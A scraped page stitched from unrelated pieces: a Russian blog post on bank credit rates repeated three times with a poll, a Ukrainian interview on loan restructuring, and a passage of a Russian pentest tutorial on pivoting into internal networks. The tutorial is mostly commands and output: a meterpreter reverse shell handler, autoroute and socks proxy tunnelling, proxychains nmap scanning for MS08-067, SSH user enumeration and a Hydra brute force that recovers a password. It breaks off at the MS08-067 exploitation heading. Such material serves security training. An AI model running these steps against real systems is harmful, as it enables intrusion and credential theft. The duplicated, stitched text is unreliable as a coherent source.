Реструктуризация кредита – свет в конце тоннеля или новая кабала? Туннелирование кредита


Забрезжил свет в конце туннеля, кредиты в рублях под 2-4%?: karfina

Для меня публикация в советской газете "Известия" письма г-ну Шувалову вызвало ощущение света в конце туннеля. Ну как же, разум проснулся и наши доблестные парламентарии вылезли из своих мерседесов и шубохранилищ, и трезво взглянули на экономическую ситуацию в России. Целый зампред комитета Госдумы сказал - "Хватит душить предприятия в своей бесконечной погоне за наживой, и предложил вице-премьеру снизить Цену деньгам".

В сети интернет, в живом журнале в частности я много раз читал недоуменные посты о размерах кредитных ставок для сельхозпроизводителей и промышленных предприятий. Сколько всякого кидалось на вентиляторы, когда обсуждалась тема 4% по кредитам Сбербанка в Чехии и 22% в России. Экономистов в России мало, в сети их почти нет, но это не страшно, складывается ощущение, что и в правительстве их не много, а уж в Центробанке экономистов вообще набирали по размеру ступни и опыты работы на детских аттракционах, а может и по объявлению.

«Регулятор, по нашему мнению, через коммерческие банки должен выделять промышленным предприятиям, в первую очередь высокотехнологичного сектора, а также производственным и перерабатывающим предприятиям аграрного сектора финансовые средства, «подкрасив» их для целевого использования. При этом доступ реальных производств к кредитам необходимо обеспечить ставкой в размере 2,5–4%, ограничив маржинальную наценку банками до 1,5%» вот что пишет г-н Гутенев вице-премьеру Игорю Шувалову. Блин так что выходит, что все интернет баталии по поводу дешевых целевых кредитов для аграриев и производственников наконец попали в цель? Кто-то услышал глаз вопиющих в пустыне отсутствующих дешевых кредитов от зарубежных банков! Ура, вот теперь аграрии и производственники заживут, наконец Центробанк будет давать коммерческим банкам дешевые, целевые кредиты и разрешит накручивать не более 1,%-2% прибыли.

Текущая ставка продажи денег 8,25% или 11,5% там не совсем понятно ху из ху. Что 8,25% это процент под который Центробанк выдает деньги по правительственым программам. А 11,5 это процент под который коммерческий банк получает деньги для выдачи всем желающим, а дальше идет полная красота, накручивай не хочу. Ставки в 36% для граждан это уже не фантастика, это наша реальность. Сельхозсектор и Промышленники получают деньги значительно дешевле, пусть под 14% и 16%, но это же одна редька. Разбалованные производственники с аграриями привыкли получать деньги у западных банков под 3-5% и ставки Российских банков это «вилы» для людей, которые реально, что-то производят в этой стране. Наконец пошла реакция, прошел только год с введения жестких санкций, только год предприятия сокращают работников, урезают выплаты, начался кризис платежей. Только год как брендом рынка недвижимости стало слово «Аренда» и вот, СВЕРШИЛОСЬ! На самом верху заговорили о неподъемных процентных ставках. Я надеюсь это реальное начало выхода из кризиса порожденной собственниками коммерческих банков, я даже в Храме свечку поставлю чтобы не ошибиться, но ...

Я уверен, что большинство владельцев наших коммерческих банков сидит как раз у вершины пирамиды власти, они сами принимают законы, которые стимулируют развития бизнеса или всё-таки увеличение прибыли в своих карманах. Возможно демарш г-на Гутенев связан с систематическими отзывами лицензий у коммерческих банков и в этот раз закрыли банк в котором гениально командовала его супруга или 18 летняя "племянница".

Ну не верю я доброту власть имущих, только в интерес...

Что же делать с кредитами?

Надо уменьшать стоимость кредитов!

27(55.1%)

Кредиты - это зло!

14(28.6%)

Греческий вариант ))

5(10.2%)

Нам это ни к чему!

3(6.1%)

karfina.livejournal.com

Забрезжил свет в конце туннеля, кредиты в рублях под 2-4%?

Для меня публикация в советской газете "Известия" письма г-ну Шувалову вызвало ощущение света в конце туннеля. Ну как же, разум проснулся и наши доблестные парламентарии вылезли из своих мерседесов и шубохранилищ, и трезво взглянули на экономическую ситуацию в России. Целый зампред комитета Госдумы сказал - "Хватит душить предприятия в своей бесконечной погоне за наживой, и предложил вице-премьеру снизить Цену деньгам".

В сети интернет, в живом журнале в частности я много раз читал недоуменные посты о размерах кредитных ставок для сельхозпроизводителей и промышленных предприятий. Сколько всякого кидалось на вентиляторы, когда обсуждалась тема 4% по кредитам Сбербанка в Чехии и 22% в России. Экономистов в России мало, в сети их почти нет, но это не страшно, складывается ощущение, что и в правительстве их не много, а уж в Центробанке экономистов вообще набирали по размеру ступни и опыты работы на детских аттракционах, а может и по объявлению.

«Регулятор, по нашему мнению, через коммерческие банки должен выделять промышленным предприятиям, в первую очередь высокотехнологичного сектора, а также производственным и перерабатывающим предприятиям аграрного сектора финансовые средства, «подкрасив» их для целевого использования. При этом доступ реальных производств к кредитам необходимо обеспечить ставкой в размере 2,5–4%, ограничив маржинальную наценку банками до 1,5%» вот что пишет г-н Гутенев вице-премьеру Игорю Шувалову. Блин так что выходит, что все интернет баталии по поводу дешевых целевых кредитов для аграриев и производственников наконец попали в цель? Кто-то услышал глаз вопиющих в пустыне отсутствующих дешевых кредитов от зарубежных банков! Ура, вот теперь аграрии и производственники заживут, наконец Центробанк будет давать коммерческим банкам дешевые, целевые кредиты и разрешит накручивать не более 1,%-2% прибыли.

Текущая ставка продажи денег 8,25% или 11,5% там не совсем понятно ху из ху. Что 8,25% это процент под который Центробанк выдает деньги по правительственым программам. А 11,5 это процент под который коммерческий банк получает деньги для выдачи всем желающим, а дальше идет полная красота, накручивай не хочу. Ставки в 36% для граждан это уже не фантастика, это наша реальность. Сельхозсектор и Промышленники получают деньги значительно дешевле, пусть под 14% и 16%, но это же одна редька. Разбалованные производственники с аграриями привыкли получать деньги у западных банков под 3-5% и ставки Российских банков это «вилы» для людей, которые реально, что-то производят в этой стране. Наконец пошла реакция, прошел только год с введения жестких санкций, только год предприятия сокращают работников, урезают выплаты, начался кризис платежей. Только год как брендом рынка недвижимости стало слово «Аренда» и вот, СВЕРШИЛОСЬ! На самом верху заговорили о неподъемных процентных ставках. Я надеюсь это реальное начало выхода из кризиса порожденной собственниками коммерческих банков, я даже в Храме свечку поставлю чтобы не ошибиться, но ...

Я уверен, что большинство владельцев наших коммерческих банков сидит как раз у вершины пирамиды власти, они сами принимают законы, которые стимулируют развития бизнеса или всё-таки увеличение прибыли в своих карманах. Возможно демарш г-на Гутенев связан с систематическими отзывами лицензий у коммерческих банков и в этот раз закрыли банк в котором гениально командовала его супруга или 18 летняя "племянница".

Ну не верю я доброту власть имущих, только в интерес...

Что же делать с кредитами?

Надо уменьшать стоимость кредитов!

27(55.1%)

Кредиты - это зло!

14(28.6%)

Греческий вариант ))

5(10.2%)

Нам это ни к чему!

3(6.1%)

pilip-pilipich.livejournal.com

Забрезжил свет в конце туннеля, кредиты в рублях под 2-4%?

pilip_pilipich — 28.07.2015 Для меня публикация в советской газете "Известия" письма г-ну Шувалову вызвало ощущение света в конце туннеля. Ну как же, разум проснулся и наши доблестные парламентарии вылезли из своих мерседесов и шубохранилищ, и трезво взглянули на экономическую ситуацию в России. Целый зампред комитета Госдумы сказал - "Хватит душить предприятия в своей бесконечной погоне за наживой, и предложил вице-премьеру снизить Цену деньгам".

В сети интернет, в живом журнале в частности я много раз читал недоуменные посты о размерах кредитных ставок для сельхозпроизводителей и промышленных предприятий. Сколько всякого кидалось на вентиляторы, когда обсуждалась тема 4% по кредитам Сбербанка в Чехии и 22% в России. Экономистов в России мало, в сети их почти нет, но это не страшно, складывается ощущение, что и в правительстве их не много, а уж в Центробанке экономистов вообще набирали по размеру ступни и опыты работы на детских аттракционах, а может и по объявлению.

«Регулятор, по нашему мнению, через коммерческие банки должен выделять промышленным предприятиям, в первую очередь высокотехнологичного сектора, а также производственным и перерабатывающим предприятиям аграрного сектора финансовые средства, «подкрасив» их для целевого использования. При этом доступ реальных производств к кредитам необходимо обеспечить ставкой в размере 2,5–4%, ограничив маржинальную наценку банками до 1,5%» вот что пишет г-н Гутенев вице-премьеру Игорю Шувалову. Блин так что выходит, что все интернет баталии по поводу дешевых целевых кредитов для аграриев и производственников наконец попали в цель? Кто-то услышал глаз вопиющих в пустыне отсутствующих дешевых кредитов от зарубежных банков! Ура, вот теперь аграрии и производственники заживут, наконец Центробанк будет давать коммерческим банкам дешевые, целевые кредиты и разрешит накручивать не более 1,%-2% прибыли.

Текущая ставка продажи денег 8,25% или 11,5% там не совсем понятно ху из ху. Что 8,25% это процент под который Центробанк выдает деньги по правительственым программам. А 11,5 это процент под который коммерческий банк получает деньги для выдачи всем желающим, а дальше идет полная красота, накручивай не хочу. Ставки в 36% для граждан это уже не фантастика, это наша реальность. Сельхозсектор и Промышленники получают деньги значительно дешевле, пусть под 14% и 16%, но это же одна редька. Разбалованные производственники с аграриями привыкли получать деньги у западных банков под 3-5% и ставки Российских банков это «вилы» для людей, которые реально, что-то производят в этой стране. Наконец пошла реакция, прошел только год с введения жестких санкций, только год предприятия сокращают работников, урезают выплаты, начался кризис платежей. Только год как брендом рынка недвижимости стало слово «Аренда» и вот, СВЕРШИЛОСЬ! На самом верху заговорили о неподъемных процентных ставках. Я надеюсь это реальное начало выхода из кризиса порожденной собственниками коммерческих банков, я даже в Храме свечку поставлю чтобы не ошибиться, но ...

Я уверен, что большинство владельцев наших коммерческих банков сидит как раз у вершины пирамиды власти, они сами принимают законы, которые стимулируют развития бизнеса или всё-таки увеличение прибыли в своих карманах. Возможно демарш г-на Гутенев связан с систематическими отзывами лицензий у коммерческих банков и в этот раз закрыли банк в котором гениально командовала его супруга или 18 летняя "племянница".

Ну не верю я доброту власть имущих, только в интерес...

yablor.ru

Реструктуризация кредита – свет в конце тоннеля или новая кабала?

Попав в сложную ситуацию с кредитом, многие люди пытаются решить свою проблему с помощью реструктуризации долга, которую предлагает банк. Но, зачастую, отсутствие специальных знаний у заемщика приводит к тому, что после проведения данной процедуры его положение только усугубляется. О том, что такое реструктуризация долга по кредиту, и действительно ли она является светом в конце тоннеля для заемщика, расскажет юрист-консультант компании «Финансовый гид – Олимп» Василий Беник.

Расскажите, пожалуйста, что подразумевает собой реструктуризация просроченного кредита?

В первую очередь, реструктуризация – это изменение условий обслуживания кредита. Она подразумевает собой пересмотр процентной ставки, общей суммы долга и сроков возврата кредита. Чаще всего банки предлагают провести эту процедуру, если клиент имеет просрочку по кредиту более 6 месяцев. Такие заемщики сразу же вносятся в черный список всей банковской системы страны.

Что конкретно предлагает банк, обещая реструктуризировать долг по кредиту?

Существуют несколько общепринятых схем, по которым банки проводят реструктуризацию кредита. Самая популярная из них – уменьшение суммы ежемесячных платежей за счет увеличения срока кредитования. Процентная ставка при этом остается прежней. Суть в том, что срок погашения вашего кредита увеличат, в результате чего ежемесячный платеж уменьшится. Это может показаться настоящим решением проблемы, если закрыть глаза на то, что сумма переплаты по процентам в итоге станет еще большей.

Часто заемщику, который до конца не понимает, что такое реструктуризация задолженности по кредиту, банк предлагает просто финансовую передышку. То есть предоставляет отсрочку кредитных платежей на определенный отрезок времени. Такое решение я бы назвал откладыванием проблемы на завтра.

Самый большой процент должников в Украине приходится на ПриватБанк. Есть ли какие-то особенности реструктуризации долга по кредиту у ПриватБанка?

В случае проблемного кредита не редко ПриватБанк сам предлагает своим должникам провести реструктуризацию кредитного долга, оповещая их об этом звонком или смс. ПриватБанк снижает сумму штрафных санкций, уменьшая тем самым размер общего долга. При этом заемщик должен сразу внести 15 % от суммы кредита, а остаток выплатить в последующее 6 месяцев. Если заемщик не выполняет данные условия, договор о реструктуризации кредитного долга аннулируется, и клиенту начисляются штрафные санкции в еще большем размере, чем изначально. Поэтому, подавая заявление о реструктуризации долга по кредитному договору, заемщику следует трезво оценить свои возможности, чтобы не попасть в еще большую долговую яму.

Может ли банк отказать заемщику, который подал заявление о реструктуризации кредитного долга?

Может, не всем клиентам, имеющим просроченную задолженность по кредитам, банк соглашается провести реструктуризацию. Некоторые банки требуют доказательств того, что погашение долгов по кредитам на данных условиях для заемщика невозможно. Такими аргументами могут стать увольнение с работы, тяжелая болезнь, длительный отпуск по уходу за ребенком и прочее.

Что Вы можете посоветовать людям, которые намерены провести реструктуризацию своего долга?

В первую очередь, разобраться, что такое реструктуризация долга по кредиту. Не действовать сгоряча, все обдумать, трезво оценить свои возможности. Самым верным решением будет обратиться за консультацией к юристу, работающему по программе «Правовая защита заемщика». Квалифицированный юрист поможет избежать серьезных проблем с вашей задолженностью по кредиту и не усугубить погашение основного долга проведением реструктуризации.

comments powered by HyperComments

fingid-olimp.com.ua

атакуем внутренние узлы корпоративной сети / Блог компании Pentestit / Хабрахабр

  В этой статье будут рассмотрены сценарии атаки защищенных сегментов корпоративной сети с помощью pivoting-техник, metasploit framework и proxychains. Многослойная сетевая архитектура создается для защиты важных корпоративных сервисов согласно концепции Defense-in-Depth, которая занимает важное место в сфере информационной безопасности. Другими словами, критичные для компании системы не могут располагаться в той же сети, что и все остальные. В данной статье я покажу на примерах, как атакующий может получить доступ к «скрытой» сети, не имея к ней прямого доступа на первых этапах тестирования на проникновение, используя методы pivoting'а или продвинутого туннелирования.

Маршрутизация

Процесс, во время которого устройства в различных сетях определяют, как им связываться друг с другом называется маршрутизацией. Маршрутизация обычно происходит на устройствах, называемых маршрутизаторами или роутерами. Они перенаправляют сетевые пакеты между узлами сети, используя таблицу маршрутизации, пока те не достигнут конечной точки назначения. Вообще говоря, маршрутизацию могут выполнять не только роутеры, но и обычные операционные системы, установленные на рабочих компьютерах.

Согласно примеру на схеме выше, для успешной маршрутизации между подсетями 192.168.1.0/24 и 192.168.10.0/24, роутер должен иметь соответствующую запись в своей таблице маршрутизации. Эта запись говорит о том, как сетевой пакет должен попадать из сети 192.168.1.0/24 в сеть 192.168.10.0/24 и наоборот.

Путь сетевого пакета можно представить так (начинается путь с узла, отправляющего пакет):

1. Может ли целевой IP-адрес находиться в моей подсети? — Если да, то доставить пакет по адресу назначения. — Если нет, то отправить пакет на шлюз. 2. Когда маршрутизатор получает пакет, он проверяет свою таблицу маршрутизации. 3. Есть ли у меня запись об узле или подсети, которой предназначен IP-пакет? — Если да, то отправить пакет в сеть назначения. — Если нет, то отправить пакет на следующий шлюз. 4. Тот же процесс повторяется на всех других роутерах. 5. В итоге пакет попадает на маршрутизатор, отвечающий за выход в Интернет из корпоративной сети, и пакет отправляется в Интернет.

Pivoting

Pivoting, это техника, с помощью которой организовывается доступ к тем сетям, к которым мы не имеем доступ при обычных обстоятельствах и полученный с использованием скомпрометированных компьютеров. Сетевая изоляция будет бесполезна в случае, если мы скомпрометируем узел сети, имеющий доступ во все изолированные подсети. Таким образом, атакующий может использовать возможности маршрутизации на скомпрометированной машине для доступа к внутренним корпоративным ресурсам. Каждый запрос, который будет сделан к внутренней сети, будет проходить через скомпрометированный хост, обычно называемый pivot. Другими словами мы получаем туннель во внутреннюю сеть для наших пакетов.

Как видно на схеме выше, устройство в центре имеет два сетевых интерфейса, чтобы получать доступ в обе сети, 192.168.1.0/24 и 192.168.10.0/24. При нормальной работе между этими двумя сетями маршрут пролегает только через маршрутизатор с сетевыми интерфейсами 192.168.1.1 и 192.168.10.1. Согласно архитектуре, авторизованный пользователь устройства в центре схемы должен иметь доступ к некоторым сервисам в DMZ.

Компрометация первого узла проброса (pivot) и проброс портов

Согласно сценарию атаки, мы получили шелл метерпретера на машине RD, которая находится в DMZ и, как выяснилось, имеет два сетевых интерфейса.

Как мы видим — роутер на схеме не имеет маршрута между нужными злоумышленнику сетями.

msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 172.16.0.20 LHOST => 172.16.0.20 msf exploit(handler) > set LPORT 1234 LPORT => 1234 msf exploit(handler) > run [*] Started reverse TCP handler on 172.16.0.20:1234 [*] Starting the payload handler... [*] Sending stage (957487 bytes) to 172.16.0.11 [*] Meterpreter session 2 opened (172.16.0.20:1234 -> 172.16.0.11:49162) meterpreter > ifconfig Interface 1 ============ Name : Software Loopback Interface 1 Hardware MAC : 00:00:00:00:00:00 MTU : 4294967295 IPv4 Address : 127.0.0.1 IPv4 Netmask : 255.0.0.0 IPv6 Address : ::1 IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff Interface 11 ============ Name : Intel(R) PRO/1000 MT Desktop Adapter Hardware MAC : 08:00:27:e1:3f:af MTU : 1500 IPv4 Address : 172.16.0.11 IPv4 Netmask : 255.255.255.0 Interface 19 ============ Name : Intel(R) PRO/1000 MT Desktop Adapter #2 Hardware MAC : 08:00:27:7f:3c:fe MTU : 1500 IPv4 Address : 7.7.7.11 IPv4 Netmask : 255.255.255.0 Далее, согласно сценарию, атакующий хочет получить доступ к подсети за интерфейсом 7.7.7.0/24. Для этого ему нужно задать правило маршрутизации для хоста RD, т.е. превратить скомпрометированный хост в pivot.

Это очень просто сделать средствами полезной нагрузки (payload) метерпретер. Следующая команда может быть использована для создания туннеля через существующую сессию метерпретера.

meterpreter > run autoroute -s 7.7.7.0/24 [*] Adding a route to 7.7.7.0/255.255.255.0... [+] Added route to 7.7.7.0/255.255.255.0 via 172.16.0.11 [*] Use the -p option to list all active routes meterpreter > run autoroute -p Active Routing Table ==================== Subnet Netmask Gateway ------ ------- ------- 7.7.7.0 255.255.255.0 Session 2 meterpreter > Согласно заданному правилу, пока сессия метерпретера с ID 2 запущена, другие модули Metasploit Framework имеют доступ к сети 7.7.7.0/24. Другими словами, после выполнения команд выше, IP адрес хоста JC будет определен, если мы воспользуемся таким модулем, как arp_scanner. JC – это хост, работающий во внутренней сети и имеющий IP-адрес 7.7.7.20.meterpreter > run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24 [*] Running module against DISCORDIA [*] ARP Scanning 7.7.7.0/24 [*] IP: 7.7.7.11 MAC 08:00:27:7f:3c:fe (CADMUS COMPUTER SYSTEMS) [*] IP 7.7.7.12 MAC 08:00:27:3a:b2:c1 (CADMUS CIMPUTER SYSTEMS) [*] IP: 7.7.7.20 MAC 08:00:27:fa:a0:c5 (CADMUS COMPUTER SYSTEMS) [*] IP: 7.7.7.255 MAC 08:00:27:3f:2a:b5 (CADMUS COMPUTER SYSTEMS) meterpreter > Мы узнали IP-адреса доступных хостов в сети 7.7.7.0/24.

Пробрасываем nmap через туннель

Чтобы пробросить nmap, маршрут должен быть сконфигурирован в metasploit, а сама конфигурация должна быть доступна через socks4 прокси. Для этого используем модуль socks4a в metasploit:meterpreter > background [*] Backgrounding session 2... msf > use auxiliary/server/socks4a msf auxiliary(socks4a) > show options Module options (auxiliary/server/socks4a): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The address to listen on SRVPORT 1080 yes The port to listen on. Auxiliary action: Name Description ---- ----------- Proxy msf auxiliary(socks4a) > set srvhost 172.16.0.20 srvhost => 172.16.0.20 msf auxiliary(socks4a) > run [*] Auxiliary module execution completed [*] Starting the socks4a proxy server msf auxiliary(socks4a) > netstat -antp | grep 1080 [*] exec: netstat -antp | grep 1080 tcp 0 172.16.0.20:1080 0.0.0.0:* LISTEN 3626/ruby msf auxiliary(socks4a) > Теперь, используя утилиту ProxyChains, любое TCP соединение может быть отправлено к цели назначения через TOR, SOCKS4, SOCKS5, HTTP/HTTPS прокси. Несколько прокси-серверов могут быть построены в цепочку. В дополнение к анонимности, при использовании такой схемы приложения могут получать доступ к обнаруженным внутренним сетям.

Прежде чем использовать ProxyChains, нужно произвести небольшую настройку в файле /etc/proxychains.conf. Для этого нужно отредактировать последнюю строку в файле.

[ProxyList] # add proxy here ... # meanwile # defaults set to "tor" #socks4 127.0.0.1 9050 socks4 172.16.0.20 1080 Теперь можно выполнить сканирование утилитой nmap через созданный нами socks4 прокси-сервер:[email protected]:~# proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms08-067.nse 7.7.7.20 ProxyChains-3.1 (http://proxychains.sf.net) Starting Nmap 7.25BETA1 ( https://nmap.org ) |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:80-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK Nmap scan report for 7.7.7.20 Host is up (0.17s latency). PORT STATE SERVICE VERSION 22/tcp open ssh Bitvise WinSSHD 7.16 (FlowSsh 7.15; protocol 2.0) 80/tcp closed http Easy File Sharing Web Server httpd 6.9 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003 Host script results: | smb-vuln-ms08-067: | VULNERABLE: | Microsoft Windows system vulnerable to remote code execution (MS08-067) | State: VULNERABLE | IDs: CVE:CVE-2008-4250 | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary | code via a crafted RPC request that triggers the overflow during path canonicalization. | | Disclosure date: 2008-10-23 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250 |_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.51 seconds [email protected]:~# На основании результатов сканирования, мы можем сказать, что нам доступны SSH и HTTP сервисы на хосте 7.7.7.20. Прежде чем двигаться дальше, мы рассмотрим еще одну технику, часто применяемую во время pivoting-а, технику проброса портов или port forwarding.

Проброс портов

Проброс портов – это один из базовых шагов во время туннелирования. Данная техника используется, когда сервис внутри обнаруженной сети недоступен напрямую. Это происходит потому что наша маршрутизация однонаправленная. Мы знаем, как получить доступ к внутреннему сервису, но сервис не имеет соответствующего маршрута к машине атакующего.

Поэтому мы перенаправим порт с машины атакующего на порт целевого сервиса через сессию метерпретера. Этот проброс порта будет работать, пока существует процесс метерпретера на скомпрометированной машине (на pivot-е).

Стоит заметить, что туннель, который был создан при помощи autoroute существует только к контексте фреймворка metasploit и доступен для других модулей. Но если мы хотим использовать туннель другими утилитами, выходящими за пределы фреймворка, нам нужны инструменты вроде proxychains и техники, такие как port forwarding.

Проброс порта может быть выполнен при помощи модуля portfwd, который является одним из post-модулей фреймворка Metasploit.

meterpreter > portfwd -h Usage: portfwd [-h] [add | delete | list | flush] [args] OPTIONS: -L <opt> Forward: local host to listen on (optional). Remote: local host to connect to. -R Indicates a reverse port forward. -h Help banner. -i <opt> Index of the port forward entry to interact with (see the "list" command). -l <opt> Forward: local port to listen on. Reverse: local port to connect to. -p <opt> Forward: remote port to connect to. Reverse: remote port to listen on. -r <opt> Forward: remote host to connect to. meterpreter > Когда мы будем отправлять запрос на подключение к нашему локальному порту 2323, вводя в браузере соответствующий URL, наш запрос будет перенаправлен на порт 80 узла 7.7.7.20 через Metasploit Framework. Ранее при помощи nmap и proxychains мы обнаружили, что во внутренней сети есть веб-сервис, работающий на TCP порте 80. Чтобы получить к нему доступ всеми доступными утилитами Kali Linux, мы должны пробросить наш локальный порт 2323 на удаленный порт 80, узла 7.7.7.20.meterpreter > portfwd add -L 172.16.0.20 -l 2323 -p 80 -r 7.7.7.20 [*] Local TCP relay created: 172.16.0.20:2323 <-> 7.7.7.20:80 meterpreter > Активные маршруты могут быть просмотрены командой portfwd list meterpreter > portfwd list Active Port Forwards ==================== Index Local Remote Direction ----- ----- ------ --------- 1 172.16.0.20:2323 7.7.7.20:80 Forward 1 total active port forwards. meterpreter > Теперь попробуем получить доступ к веб-сервису Eash File Sharing Web Server.

SSH-брутфорс через pivoting

Как вы помните, мы обнаружили так же SSH сервис на машине 7.7.7.20. Мы можем провести атаку на перебор учетных данных (брутфорс) через наш туннель. Для этого будем использовать вспомогательный модуль SSH_enumusers:msf > use auxiliary/scanner/ssh/ssh_enumusers msf auxiliary(ssh_enumusers) > set rhosts 7.7.7.20 rhosts => 7.7.7.20 msf auxiliary(ssh_enumusers) > set rport 22 rport => 22 msf auxiliary(ssh_enumusers) > set user_file /usr/share/wordlists/metasploit/default_users_for_services_unhash.txt user_file => /usr/share/wordlists/metasploit/default_users_for_services_unhash.txt msf auxiliary(ssh_enumusers) > run [*] 7.7.7.20:22 - SSH - Checking for false positives [*] 7.7.7.20:22 - SSH - Starting scan [+] 7.7.7.20:22 - SSH - User 'admin' found [-] 7.7.7.20:22 - SSH - User 'root' not found [-] 7.7.7.20:22 - SSH - User 'Administrator' not found [+] 7.7.7.20:22 - SSH - User 'sysadm' found [-] 7.7.7.20:22 - SSH - User 'tech' not found [-] 7.7.7.20:22 - SSH - User 'operator' not found [+] 7.7.7.20:22 - SSH - User 'guest' found [-] 7.7.7.20:22 - SSH - User 'security' not found [-] 7.7.7.20:22 - SSH - User 'debug' not found [+] 7.7.7.20:22 - SSH - User 'manager' found [-] 7.7.7.20:22 - SSH - User 'service' not found [-] 7.7.7.20:22 - SSH - User '!root' not found [+] 7.7.7.20:22 - SSH - User 'user' found [-] 7.7.7.20:22 - SSH - User 'netman' not found [+] 7.7.7.20:22 - SSH - User 'super' found [-] 7.7.7.20:22 - SSH - User 'diag' not found [+] 7.7.7.20:22 - SSH - User 'Cisco' found [-] 7.7.7.20:22 - SSH - User 'Manager' not found [+] 7.7.7.20:22 - SSH - User 'DTA' found [-] 7.7.7.20:22 - SSH - User 'apc' not found [+] 7.7.7.20:22 - SSH - User 'User' found [-] 7.7.7.20:22 - SSH - User 'Admin' not found [+] 7.7.7.20:22 - SSH - User 'cablecom' found [-] 7.7.7.20:22 - SSH - User 'adm' not found [+] 7.7.7.20:22 - SSH - User 'wradmin' found [-] 7.7.7.20:22 - SSH - User 'netscreen' not found [+] 7.7.7.20:22 - SSH - User 'sa' found [-] 7.7.7.20:22 - SSH - User 'setup' not found [+] 7.7.7.20:22 - SSH - User 'cmaker' found [-] 7.7.7.20:22 - SSH - User 'enable' not found [+] 7.7.7.20:22 - SSH - User 'MICRO' found [-] 7.7.7.20:22 - SSH - User 'login' not found [*] Caught interrupt from the console... [*] Auxiliary module execution completed ^C В результате выполнения команды мы обнаружили множество пользователей.

В дополнении к вспомогательным модулям Metasploit Framework, для атаки могут быть использованы такие инструменты как Hydra. Мы запустим брутфорс при помощи Hydra через ProxyChains. Весь траффик будет проходить через туннель, работающий на скомпрометированном узле RD.

[email protected]:~# proxychains hydra 7.7.7.20 ssh -s 22 -L /tmp/user.txt -P top100.txt -t 4 ProxyChains-3.1 (http://proxychains.sf.net) Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort... [DATA] max 4 tasks per 1 server, overall 64 tasks, 20 login tries (l:2/p:10), ~0 tries per task [DATA] attacking service ssh on port 22 |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK |S-chain|-<>-172.16.0.20:1080-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-7.7.7.20:22-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK <><>-OK <><>-OK <><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK [22][ssh] host: 7.7.7.20 login: admin password: 123456 |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK <><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished [email protected]:~# Далее подключиться по SSH можно через прокси-сервер с логином admin и паролем 123456, полученными при помощи [email protected]:~# proxychains ssh [email protected] ProxyChains-3.1 (http://proxychains.sf.net) |D-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK The authenticity of host '7.7.7.20 (7.7.7.20)' can't be established. ECDSA key fingerprint is SHA256:Rcz2KrPF3BTo16Ng1kET91ycbr9c8vOkZcZ6b4VawMQ. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '7.7.7.20' (ECDSA) to the list of known hosts. [email protected]'s password: bvshell:/C/Documents and Settings/All Users$ pwd /C/Documents and Settings/All Users bvshell:/C/Documents and Settings/All Users$ dir 2016-12-24 21:32 <DIR> Application Data 2016-12-25 06:16 <DIR> Desktop 2016-12-24 18:36 <DIR> Documents 2016-12-24 18:37 <DIR> DRM 2016-12-24 21:32 <DIR> Favorites 2016-12-24 18:38 <DIR> Start Menu 2016-12-24 21:32 <DIR> Templates 0 Files 0 bytes 7 Directories bvshell:/C/Documents and Settings/All Users$

Получение доступа ко второму узлу pivot

Во время сканирования nmap сети 7.7.7.0/24 были обнаружены хосты, уязвимые к MS08-067 и BoF уязвимость в приложении Easy File Share. Доступ ко второму узлу pivot может быть получен с использованием одной из уязвимостей. Другой опцией будет являться продолжение прокладывания туннеля при помощи техники SSH Port Forwarding, но здесь мы будем использовать MS08-067 и BoF.

Уязвимость MS08-067 и Bind TCP

